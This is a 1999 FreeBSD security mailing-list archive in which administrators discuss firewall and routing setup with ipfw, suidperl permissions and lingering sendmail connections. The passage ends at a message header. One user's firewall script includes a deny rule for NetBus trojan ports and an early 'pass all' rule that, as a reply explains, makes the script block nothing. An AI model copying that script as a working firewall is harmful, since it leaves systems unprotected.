<4.2.2.19991104094637.00cdd9f0@mail.computeralt.com> X-Sender: scott@mail.computeralt.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 04 Nov 1999 10:11:15 -0500 To: freebsd-security@freebsd.org From: "Scott I. Remick" Subject: Firewall questions Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I'm working on my first firewall, and have a few questions: 1) I've purchased the O'Reilly book "Building Internet Firewalls", and have printed out chapters 6.4 and 16 from the handbook. However, is there any other guide that describes in better detail how to do what I am doing? (read on for details) 2) Is sendmail necessary on a firewall? I've removed all other non-essential daemons already (r*, telnetd, ftpd, even inetd). The only service running right now is ssh, which is the only way I communicate with this system. I've never telnetted to it. 3) What the heck would be using port 111? Strobe shows it as being alive and listening. 4) How do I properly set up routes for a dual-homed firewall where both sides are within the same class C? This is the first time I've ever had to play with routing and gateways. 5) Where's the proper place to put your ipfw rules so they get reloaded on every boot? rc.local? 6) Should www/ftp/dns/etc servers be inside the firewall, or in the DMZ? What I'm ultimately trying to have is a system like the following: INTERNET <-> Router (A.B.C.1) <-> DMZ <-> (A.B.C.2) Firewall (A.B.C.3) <-> internal_network (A.B.C.*) I've already got the firewall system up and going (FreeBSD 3.3 RELEASE), with ssh 2.0.13 running. The necessary stuff to enable IPFW has been built into the kernel per Handbook 6.4. Both network cards are installed, have IPs, and appear operational. I've edited /etc/rc.firewall to match the IP addresses on our network. I've added the following to /etc/rc.conf (IP addresses and hosts have been changed): network_interfaces="ed0 ed1 lo0" ifconfig_ed0="inet A.B.C.3 netmask 255.255.255.0" ifconfig_ed1="inet A.B.C.2 netmask 255.255.255.0" defaultrouter="A.B.C.1" hostname="firewall.domain.com" sendmail_enable="NO" inetd_enable="NO" gateway_enable="YES" router_enable="YES" router="routed" router_flags="-q" firewall_script="/etc/rc.firewall" firewall_type="open" <---- YES I KNOW THIS IS BAD, I'm not ready to go live yet. firewall_enable="YES" So I feel like I'm making good progress. I'm getting a good understanding of ipfw rules. But the routes thing has got me a bit stumped. I'm not clear on what routing is being done by routed, what routing is being done (if any) by ipfw (because rc.firewall has places for you to put in both sides of your firewall), and what the difference in enabling routing and enabling gateway is. I want anything destined for the internet to go out A.B.C.2 and anything destined for the internal network to go out A.B.C.3. I figure I would then set up routes to A.B.C.1 and any systems in the DMZ as individual routes from A.B.C.2 correct? Oh well. Any advice? Tips? Suggestions? URLs? PDFs? Books? What I'm planning on doing is, once I've got the routes set up properly, then having my system point to the firewall as the gateway instead of the current router (I assume this would be the proper procedure for everyone once we're ready to go live) and then start tweaking ipfw rules. That way, everyone can remain functional until I have it set up proper. Then I'll tell the router to only communicate to the firewall, plug the router directly into A.B.C.2 w/ a cross-over cable (I'd use a separate hub if I were to set up other hosts in a DMZ, and then adjust everyone else's default gateway to be the firewall. I'm sure I'm missing a lot here and have a bunch of stuff wrong. Please advise.... thanks! :) ----------------------- Scott I. Remick scott@computeralt.com Network and Information (802)388-7545 ext. 236 Systems Manager FAX:(802)388-3697 Computer Alternatives, Inc. http://www.computeralt.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 7:26: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id 30C7214C32 for ; Thu, 4 Nov 1999 07:26:04 -0800 (PST) (envelope-from danderse@faith.cs.utah.edu) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id IAA06533; Thu, 4 Nov 1999 08:25:32 -0700 (MST) From: David G Andersen Message-Id: <199911041525.IAA06533@faith.cs.utah.edu> Subject: Re: Firewall questions To: scott@computeralt.com (Scott I. Remick) Date: Thu, 4 Nov 1999 08:25:32 -0700 (MST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <4.2.2.19991104094637.00cdd9f0@mail.computeralt.com> from "Scott I. Remick" at Nov 4, 99 10:11:15 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Scott I. Remick once said: > > 1) I've purchased the O'Reilly book "Building Internet Firewalls", and have > printed out chapters 6.4 and 16 from the handbook. However, is there any > other guide that describes in better detail how to do what I am doing? > (read on for details) It depends what you want to accomplish with your firewall. > > 2) Is sendmail necessary on a firewall? I've removed all other > non-essential daemons already (r*, telnetd, ftpd, even inetd). The only > service running right now is ssh, which is the only way I communicate with > this system. I've never telnetted to it. See above: It depend what... > 3) What the heck would be using port 111? Strobe shows it as being alive > and listening. portmapper. See /etc/rc.conf > 4) How do I properly set up routes for a dual-homed firewall where both > sides are within the same class C? This is the first time I've ever had to > play with routing and gateways. Subnet them into /25's, or use RFC1918 addresses on the inside. > 5) Where's the proper place to put your ipfw rules so they get reloaded on > every boot? rc.local? /etc/{name} and then set your firewall name in /etc/rc.conf > 6) Should www/ftp/dns/etc servers be inside the firewall, or in the DMZ? Depends what you need to do with 'em. Obviously, your internal hosts need DNS service; I'd stick a DNS server inside. As for external access to your DNS server, that's your call (or an economic decision. :-) WWW and FTP are traditionally put in the DMZ, but again. > So I feel like I'm making good progress. I'm getting a good understanding > of ipfw rules. But the routes thing has got me a bit stumped. I'm not > clear on what routing is being done by routed, what routing is being done > (if any) by ipfw (because rc.firewall has places for you to put in both > sides of your firewall), and what the difference in enabling routing and > enabling gateway is. If you've only got a few networks, don't use routed, use static routes. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 7:54:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from lily.ezo.net (lily.ezo.net [206.102.130.13]) by hub.freebsd.org (Postfix) with ESMTP id 054DE14DCE for ; Thu, 4 Nov 1999 07:54:49 -0800 (PST) (envelope-from jflowers@ezo.net) Received: from lily.ezo.net (jflowers@localhost.ezo.net [127.0.0.1]) by lily.ezo.net (8.8.7/8.8.7) with SMTP id KAA11871; Thu, 4 Nov 1999 10:54:19 -0500 (EST) Date: Thu, 4 Nov 1999 10:54:19 -0500 (EST) From: Jim Flowers To: "Scott I. Remick" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall questions In-Reply-To: <4.2.2.19991104094637.00cdd9f0@mail.computeralt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See below Jim Flowers #4 ISP on C|NET, #1 in Ohio On Thu, 4 Nov 1999, Scott I. Remick wrote: > Hello. I'm working on my first firewall, and have a few questions: > > 1) I've purchased the O'Reilly book "Building Internet Firewalls", and have > printed out chapters 6.4 and 16 from the handbook. However, is there any > other guide that describes in better detail how to do what I am doing? > (read on for details) Good start! > > 2) Is sendmail necessary on a firewall? I've removed all other > non-essential daemons already (r*, telnetd, ftpd, even inetd). The only > service running right now is ssh, which is the only way I communicate with > this system. I've never telnetted to it. Not necessary but useful as a relay between outside (Internet) and inside mail-hub. Look at fwtk for a wrapped approach using smap and smapd. > > 3) What the heck would be using port 111? Strobe shows it as being alive > and listening. Here's a handy way to learn about well-known ports. trapper# grep 111 /etc/services sunrpc 111/tcp rpcbind #SUN Remote Procedure Call sunrpc 111/udp rpcbind #SUN Remote Procedure Call > > 4) How do I properly set up routes for a dual-homed firewall where both > sides are within the same class C? This is the first time I've ever had to > play with routing and gateways. Routing is a big subject. You just need static routes, not routing software like routed or gated. Just remember that in order to traverse a router you have to have a way to identify groups of addresses. That involves subnets. Best to get another book and read it. Use a small subnet for a perimeter network. 8 addresses is about right for most. > > 5) Where's the proper place to put your ipfw rules so they get reloaded on > every boot? rc.local? rc.firewall - copy OPEN to a name of your choosing and modify it, then identify it in rc.conf. > > 6) Should www/ftp/dns/etc servers be inside the firewall, or in the DMZ? I prefer the DMZ as they are sacrificial hosts and you are always aware of their exposure there. Better to not let packets travel between the Internet and your inside network. > > What I'm ultimately trying to have is a system like the following: > > INTERNET <-> Router (A.B.C.1) <-> DMZ <-> (A.B.C.2) Firewall (A.B.C.3) <-> > internal_network (A.B.C.*) Try: (A.B.C.3) + | | <-> | Bastion Host| | | + (A.B.C.9) INTERNET <-> | Router | <-> | Firewall | <-> internal+network | | (A.B.C.1)--+ +-(A.B.C.2) Most intuitive setup is to use inbound filters only. You know where they are coming from. Put Internet->DMZ and DMZ-Internet filters in Router. Deny Internet->Firewall and Firewall->Internet. Put DMZ->internal and internal->DMZ on Firewall and deny Router <-> internal. Redundancy. > > I've already got the firewall system up and going (FreeBSD 3.3 RELEASE), > with ssh 2.0.13 running. The necessary stuff to enable IPFW has been built > into the kernel per Handbook 6.4. Both network cards are installed, have > IPs, and appear operational. I've edited /etc/rc.firewall to match the IP > addresses on our network. I've added the following to /etc/rc.conf (IP > addresses and hosts have been changed): > > network_interfaces="ed0 ed1 lo0" > ifconfig_ed0="inet A.B.C.3 netmask 255.255.255.0" > ifconfig_ed1="inet A.B.C.2 netmask 255.255.255.0" Can't route between ed0 and ed1. Same subdomain. > defaultrouter="A.B.C.1" > hostname="firewall.domain.com" > sendmail_enable="NO" > inetd_enable="NO" > gateway_enable="YES" > router_enable="YES" > router="routed" > router_flags="-q" Don't bother with routing software. Use static routes. > firewall_script="/etc/rc.firewall" > firewall_type="open" <---- YES I KNOW THIS IS BAD, I'm not ready to go > live yet. > firewall_enable="YES" > > So I feel like I'm making good progress. I'm getting a good understanding > of ipfw rules. But the routes thing has got me a bit stumped. I'm not > clear on what routing is being done by routed, what routing is being done > (if any) by ipfw (because rc.firewall has places for you to put in both > sides of your firewall), and what the difference in enabling routing and > enabling gateway is. Routing is done in the kernal. Route is used to manage static routes. Routed is unnecessary. Ipfw doesn't do routing. > > I want anything destined for the internet to go out A.B.C.2 and anything > destined for the internal network to go out A.B.C.3. I figure I would then > set up routes to A.B.C.1 and any systems in the DMZ as individual routes > from A.B.C.2 correct? Oh well. Any advice? Tips? Suggestions? URLs? PDFs? > Books? Use a default route to point towards the Internet using the next direct connected address. > > What I'm planning on doing is, once I've got the routes set up properly, > then having my system point to the firewall as the gateway instead of the > current router (I assume this would be the proper procedure for everyone > once we're ready to go live) and then start tweaking ipfw rules. That way, > everyone can remain functional until I have it set up proper. Then I'll > tell the router to only communicate to the firewall, plug the router > directly into A.B.C.2 w/ a cross-over cable (I'd use a separate hub if I > were to set up other hosts in a DMZ, and then adjust everyone else's > default gateway to be the firewall. > > I'm sure I'm missing a lot here and have a bunch of stuff wrong. Please > advise.... thanks! :) Might be easiest to do away with all but one box and configure natd using private addresses on it until the routing concepts are mastered. > ----------------------- > Scott I. Remick scott@computeralt.com > Network and Information (802)388-7545 ext. 236 > Systems Manager FAX:(802)388-3697 > Computer Alternatives, Inc. http://www.computeralt.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 8: 2:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id D4F5614C58 for ; Thu, 4 Nov 1999 08:02:16 -0800 (PST) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id KAA10471; Thu, 4 Nov 1999 10:01:54 -0600 (CST) From: Igor Roshchin Message-Id: <199911041601.KAA10471@alecto.physics.uiuc.edu> Subject: suidperl ? (Was: Examining FBSD set[ug]ids and their use) In-Reply-To: from "Robert Watson" at "Nov 3, 1999 10: 3:15 pm" To: robert+freebsd@cyrus.watson.org, freebsd-security@FreeBSD.ORG Date: Thu, 4 Nov 1999 10:01:54 -0600 (CST) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! I remember this question being discussed about 1-2 years ago when a hole in suidperl was discovered, but at the moment can not find the information. Question: Does anything in FreeBSD 3.x depend on suidperl being suid ? Would anything break in the system and/or system utilities if it is stripped off ? Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 8:50:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id E519E15312 for ; Thu, 4 Nov 1999 08:50:30 -0800 (PST) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #2) id 11jQ4v-0007Or-00; Thu, 4 Nov 1999 09:49:38 -0700 Message-ID: <3821B920.F1A47745@softweyr.com> Date: Thu, 04 Nov 1999 09:49:36 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "Scott I. Remick" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Firewall questions References: <4.2.2.19991104094637.00cdd9f0@mail.computeralt.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Scott I. Remick" wrote: > > 2) Is sendmail necessary on a firewall? I've removed all other > non-essential daemons already (r*, telnetd, ftpd, even inetd). The only > service running right now is ssh, which is the only way I communicate with > this system. I've never telnetted to it. If you want to be able to send mail into the firewall, yes. For outgoing mail, sendmail is called directly. Outgoing mail that has to be queued up, for whatever reason, won't be resent unless you have sendmail running as a daemon. > 3) What the heck would be using port 111? Strobe shows it as being alive > and listening. wes@homer$ grep 111 /etc/services sunrpc 111/tcp rpcbind #SUN Remote Procedure Call sunrpc 111/udp rpcbind #SUN Remote Procedure Call > 4) How do I properly set up routes for a dual-homed firewall where both > sides are within the same class C? This is the first time I've ever had to > play with routing and gateways. Manually. ;^) Make the inside address of the firewall the default route for all the other machines on the network. On the firewall machine itself, make the other end of the outside link the default route. That should take care of it. > 5) Where's the proper place to put your ipfw rules so they get reloaded on > every boot? rc.local? > > 6) Should www/ftp/dns/etc servers be inside the firewall, or in the DMZ? Yes. For DNS, put the primary inside the firewall and a secondary outside. WWW and FTP servers outside, so a penetration won't damage your internal network. Turn off all network login services except ssh on the servers outside the firewall, and on the firewall itself. BTW, Cheswick and Bellovin refer to your "firewall" machine as a "bastion host." You may want to read through a copy of their book, too. > What I'm ultimately trying to have is a system like the following: > > INTERNET <-> Router (A.B.C.1) <-> DMZ <-> (A.B.C.2) Firewall (A.B.C.3) <-> > internal_network (A.B.C.*) > > I've already got the firewall system up and going (FreeBSD 3.3 RELEASE), > with ssh 2.0.13 running. The necessary stuff to enable IPFW has been built > into the kernel per Handbook 6.4. Both network cards are installed, have > IPs, and appear operational. I've edited /etc/rc.firewall to match the IP > addresses on our network. I've added the following to /etc/rc.conf (IP > addresses and hosts have been changed): > > network_interfaces="ed0 ed1 lo0" > ifconfig_ed0="inet A.B.C.3 netmask 255.255.255.0" > ifconfig_ed1="inet A.B.C.2 netmask 255.255.255.0" > defaultrouter="A.B.C.1" > hostname="firewall.domain.com" > sendmail_enable="NO" > inetd_enable="NO" > gateway_enable="YES" > router_enable="YES" > router="routed" > router_flags="-q" > firewall_script="/etc/rc.firewall" > firewall_type="open" <---- YES I KNOW THIS IS BAD, I'm not ready to go > live yet. > firewall_enable="YES" > > So I feel like I'm making good progress. I'm getting a good understanding > of ipfw rules. But the routes thing has got me a bit stumped. I'm not > clear on what routing is being done by routed, what routing is being done > (if any) by ipfw (because rc.firewall has places for you to put in both > sides of your firewall), and what the difference in enabling routing and > enabling gateway is. You don't want to run routed, your network is far too simple for that. The machines inside the firewall use the inside address of the firewall, A.B.C.3, as their default route. The firewall machine and the servers in the DMZ use A.B.C.1 as their default route. For communications between your network and the DMZ, you may want to use proxy ARP on the firewall, or just enter host routes through the firewall machine. > I want anything destined for the internet to go out A.B.C.2 and anything > destined for the internal network to go out A.B.C.3. I figure I would then > set up routes to A.B.C.1 and any systems in the DMZ as individual routes > from A.B.C.2 correct? Oh well. Any advice? Tips? Suggestions? URLs? PDFs? > Books? Static host routes will work. Proxy arp might be easier to use. Take a look at choparp, in ports/net: DESCRIPTION choparp is a easy-to-use proxy arp daemon. It watches arp request pack- ets visible on the interface specified by argument if_name, and sends proxy arp reply to the sender if the arp request queries the MAC address (ethernet hardware address) for the network speicified by net_addr and net_mask. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 9:41:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from lh2.rdc1.ab.home.com (ha2.rdc1.ab.wave.home.com [24.64.2.51]) by hub.freebsd.org (Postfix) with ESMTP id 8C99B15717 for ; Thu, 4 Nov 1999 09:41:00 -0800 (PST) (envelope-from schofiel@home.com) Received: from merlin ([24.65.131.93]) by lh2.rdc1.ab.home.com (InterMail v4.01.01.00 201-229-111) with SMTP id <19991104174059.UULJ7692.lh2.rdc1.ab.home.com@merlin> for ; Thu, 4 Nov 1999 09:40:59 -0800 From: "Curtis Schofield" To: Subject: FW: rc.firewall Date: Thu, 4 Nov 1999 10:44:39 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hello, i was checking out my firewall, an it seems that it doesn't actually do anything =), i've been tring to get it to block FTP lately for example, but when i ftp in from a remote host it isn't blocked.. Could someOne help me? This is my situation: I am running DHCPclient and as such i don't have a static ip that i could put into the rc.firewall, i was told that it would be OK to generalize the whole thing (ie any to any) but it doesn't apear to be working.. #!/bin/sh fwcmd="/sbin/ipfw -N" $fwcmd -f flush $fwcmd add 100 divert natd all from any to any via xl0 $fwcmd add 110 pass all from any to any $fwcmd add 120 pass all from any to any via lo0 $fwcmd add 130 pass tcp from any to any established $fwcmd add 144 pass all from 10.0.0.0/3 to any #accept $fwcmd add 200 pass tcp from any to any 25 # sendmail #$fwcmd add 310 pass tcp from any to any 20-21 # ftp $fwcmd add 320 pass tcp from any to any 22 # ssh $fwcmd add 315 pass udp from any 53 to any # dns (don't log) ##$fwcmd add 318 pass udp from any 9000 to any # Asherons Call $fwcmd add 350 pass tcp from any to any 80 # werld wide weeb $fwcmd add 320 pass tcp from any to any 110 # pop3 #deny $fwcmd add 10000 deny log tcp from any to any 20-21 # block FTP $fwcmd add 10001 deny log udp from any to any 20-21 # block FTP $fwcmd add 10160 deny log icmp from any to any #icmp $fwcmd add 10160 deny log udp from any to any #udp $fwcmd add 10155 deny log tcp from any to any 2049 #nfs (tcp) $fwcmd add 10155 deny log tcp from any to any 0-1024 #services $fwcmd add 10155 deny log tcp from any to any 12300-12350 #netbus $fwcmd add 10150 deny log tcp from any to any 23 # use ssh not telnet #accept remaining #$fwcmd add 6500 pass all from any to any I have commented some stuff out, as i was monkeying with it.. I also have IPFIREWALL IPFIREWALL_VERBOSE IPDIVERT IPFIREWALL_FORWARD in the kernel Please someone help? Why doesn't this apear to work.. (the only thing i could do to stop ftp was comment it out in /etc/services) I'm new to ipfw, and wouldn't mind if someone could help and or point me to resources that would help with this problem THanks! Curtis To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 10: 9:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from erouter0.it-datacntr.louisville.edu (erouter0.it-datacntr.louisville.edu [136.165.1.36]) by hub.freebsd.org (Postfix) with ESMTP id 806D21568B for ; Thu, 4 Nov 1999 10:09:20 -0800 (PST) (envelope-from k.stevenson@louisville.edu) Received: from osaka.louisville.edu (osaka.louisville.edu [136.165.1.114]) by erouter0.it-datacntr.louisville.edu (Postfix) with ESMTP id 5C24724D03; Thu, 4 Nov 1999 13:08:42 -0500 (EST) Received: by osaka.louisville.edu (Postfix, from userid 15) id C3AEB18605; Thu, 4 Nov 1999 13:08:41 -0500 (EST) Date: Thu, 4 Nov 1999 13:08:41 -0500 From: Keith Stevenson To: Igor Roshchin Cc: freebsd-security@freebsd.org Subject: Re: suidperl ? (Was: Examining FBSD set[ug]ids and their use) Message-ID: <19991104130841.F9083@osaka.louisville.edu> References: <199911041601.KAA10471@alecto.physics.uiuc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i In-Reply-To: <199911041601.KAA10471@alecto.physics.uiuc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Nov 04, 1999 at 10:01:54AM -0600, Igor Roshchin wrote: > > Question: > Does anything in FreeBSD 3.x depend on suidperl being suid ? > > Would anything break in the system and/or system utilities if > it is stripped off ? I routinely set the NOSUIDPERL flag in /etc/make.conf and delete the suidperl and sperl binaries. I've yet to notice any system breakage resulting from it. Regards, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville k.stevenson@louisville.edu PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 10:17:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from goshen.rutgers.edu (goshen.rutgers.edu [165.230.180.150]) by hub.freebsd.org (Postfix) with ESMTP id 0450214DF6 for ; Thu, 4 Nov 1999 10:17:39 -0800 (PST) (envelope-from damascus@eden.rutgers.edu) Received: from damascus (damascus.dorm.rutgers.edu [165.230.0.68]) by goshen.rutgers.edu (8.8.8/8.8.8) with ESMTP id NAA07738; Thu, 4 Nov 1999 13:15:55 -0500 (EST) Message-Id: <4.2.0.58.19991104131213.00aca850@email.eden.rutgers.edu> X-Sender: damascus@email.eden.rutgers.edu X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 04 Nov 1999 13:16:21 -0500 To: "Curtis Schofield" , From: Carroll Kong Subject: Re: FW: rc.firewall In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:44 AM 11/4/99 -0700, Curtis Schofield wrote: >hello, i was checking out my firewall, an it seems that it doesn't actually >do anything >=), i've been tring to get it to block FTP lately for example, but when i >ftp in from >a remote host it isn't blocked.. > >Could someOne help me? > >This is my situation: > I am running DHCPclient and as such i don't have a static ip that > i could >put into >the rc.firewall, i was told that it would be OK to generalize the whole >thing (ie any to any) but it doesn't apear to be working.. > >#!/bin/sh >fwcmd="/sbin/ipfw -N" >$fwcmd -f flush > >$fwcmd add 100 divert natd all from any to any via xl0 >$fwcmd add 110 pass all from any to any >$fwcmd add 120 pass all from any to any via lo0 >$fwcmd add 130 pass tcp from any to any established >$fwcmd add 144 pass all from 10.0.0.0/3 to any >Please someone help? Why doesn't this apear to work.. > >(the only thing i could do to stop ftp was comment it out in /etc/services) > >I'm new to ipfw, and wouldn't mind if someone could help and or point me to >resources that would help with this problem > >THanks! >Curtis I snipped out a bit, but basically, if you have this rule...... $fwcmd add 110 pass all from any to any it will pass all the packets, and never filter the others. By declaring add or so, you are saying... try out the rule in this order, and if you already told it to pass all the packets with a rule # earlier than consequential rules, the future rules will never get a chance to match. At least, this seems like what is wrong to me. To double check, reload that firewall script, run ipfw show as root, and see if the #s in the first two columns of rule #110 is increasing, whereas all the other rules underneath never have a match. If that is the case, then my hypothesis is most likely correct, and that rule is passing everything before even getting a chance to get matched. -Carroll Kong To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 10:19:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id B1F9214DF6 for ; Thu, 4 Nov 1999 10:19:51 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA50123; Thu, 4 Nov 1999 10:19:35 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199911041819.KAA50123@gndrsh.dnsmgr.net> Subject: Re: Firewall questions In-Reply-To: <199911041525.IAA06533@faith.cs.utah.edu> from David G Andersen at "Nov 4, 1999 08:25:32 am" To: danderse@cs.utah.edu (David G Andersen) Date: Thu, 4 Nov 1999 10:19:34 -0800 (PST) Cc: scott@computeralt.com (Scott I. Remick), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > 4) How do I properly set up routes for a dual-homed firewall where both > > sides are within the same class C? This is the first time I've ever had to > > play with routing and gateways. > > Subnet them into /25's, or use RFC1918 addresses on the inside. Variable length subnet them into a /30 between the firewall and the outside router, use the rest inside. I generally don't put more than 32 or 64 IP's on one ethernet segment and don't use proxy arp or number virtuals (see ARIN guidlines on IP space usage). ifconfig_ed0="inet A.B.C.2 netmask 0xfffffffc" ifconfig_ed1="inet A.B.C.33 netmask 0xffffffe0" You can use the rest by routing them off someplace else later. You should also really do a proper IP space plan... -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 12:46:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from frontiernet.net (node9.frontiernet.net [209.130.129.194]) by hub.freebsd.org (Postfix) with ESMTP id C093914C86 for ; Thu, 4 Nov 1999 12:46:29 -0800 (PST) (envelope-from pani@frontiernet.net) Received: from frontiernet.net (209-130-164-150.nas1.APV.gblx.net [209.130.164.150]) by frontiernet.net (8.8.8a/8.8.8) with ESMTP id PAA99784 for ; Thu, 4 Nov 1999 15:46:27 -0500 Message-ID: <3821EFEE.D6B4ED33@frontiernet.net> Date: Thu, 04 Nov 1999 14:43:26 -0600 From: Sandipan Panigrahi X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: bsdsecurity Subject: sendmail connections staying open. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sendmail 8.9.3 A "ps xo command | grep sendmail" on my BSD box I get this output. sendmail: accepting connections on port 25 (sendmail) sendmail: server pppdslc242.mpls.uswest.net [216.160.21.242] cmd read (sendmail) sendmail: server pppdslc242.mpls.uswest.net [216.160.21.242] child wait (sendmail) sendmail: server wagner.kaist.ac.kr [143.248.146.22] child wait (sendmail) sendmail: OAA03852 wagner.kaist.ac.kr [143.248.146.22]: DATA (sendmail) sendmail: server [209.247.75.220] child wait (sendmail) sendmail: OAA03864 [209.247.75.220]: DATA (sendmail) And in the maillog I see : Nov 4 12:11:05 greenberg sendmail[3643]: LAA03643: from=, size= 0, class=0, pri=30000, nrcpts=1, msgid=<199911041711.LAA03643@netsurfin.com>, proto=SMTP, relay=wagner.kaist.ac.kr [143.248.146.22] Nov 4 13:11:23 greenberg sendmail[3692]: MAA03692: timeout waiting for input from wagner .kaist.ac.kr during message collect And I sent e-mail from pppdslc242.mpls.uswest.net to root@greenberg.com with the mail server set to greenberg.com. though I receive the mail the cmd read and child wait lines keep showing up and stay there even after the email is delivered. Is the system compromised ? Or is there some kind of timeout that I need to set for sendmail to cleanup its connections ? Thanks for any information, pani To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 4 14:44:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de [195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id 0F4F31568B for ; Thu, 4 Nov 1999 14:44:13 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id XAA11397 for freebsd-security@FreeBSD.ORG; Thu, 4 Nov 1999 23:41:28 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id XAA00600 for freebsd-security@FreeBSD.ORG; Thu, 4 Nov 1999 23:24:45 +0100 (MET) From: Juergen Lock Date: Thu, 4 Nov 1999 23:24:44 +0100 To: freebsd-security@FreeBSD.ORG 